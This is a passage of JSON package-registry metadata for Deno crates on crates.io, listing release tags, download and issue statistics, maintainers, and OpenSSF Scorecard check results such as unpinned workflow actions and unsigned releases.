ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T11:48:15.781Z","dependent_packages_count":0,"downloads":46583,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":55.34981178505731,"dependent_repos_count":16.706699993903555,"dependent_packages_count":22.074823711109754,"stargazers_count":0.024770467106037905,"forks_count":0.040607323124652296,"docker_downloads_count":null,"average":18.83934265606026},"purl":"pkg:cargo/deno_node_crypto","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_node_crypto","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_node_crypto","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_node_crypto/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-03-04T18:06:12.362Z","updated_at":"2026-03-04T18:06:12.362Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-02-12T15:17:54.923Z","updated_at":"2026-02-12T15:17:54.923Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4046936,"name":"deno_bench_util","ecosystem":"cargo","description":"Bench and profiling utilities for deno crates","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":251,"first_release_published_at":"2021-05-20T14:47:30.859Z","latest_release_published_at":"2026-08-27T15:20:05.959Z","latest_release_number":"0.252.0","last_synced_at":"2026-09-07T23:01:44.346Z","created_at":"2022-04-12T09:57:31.857Z","updated_at":"2026-09-07T23:01:44.346Z","registry_url":"https://crates.io/crates/deno_bench_util/","install_command":"cargo install deno_bench_util","documentation_url":"https://docs.rs/deno_bench_util/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your 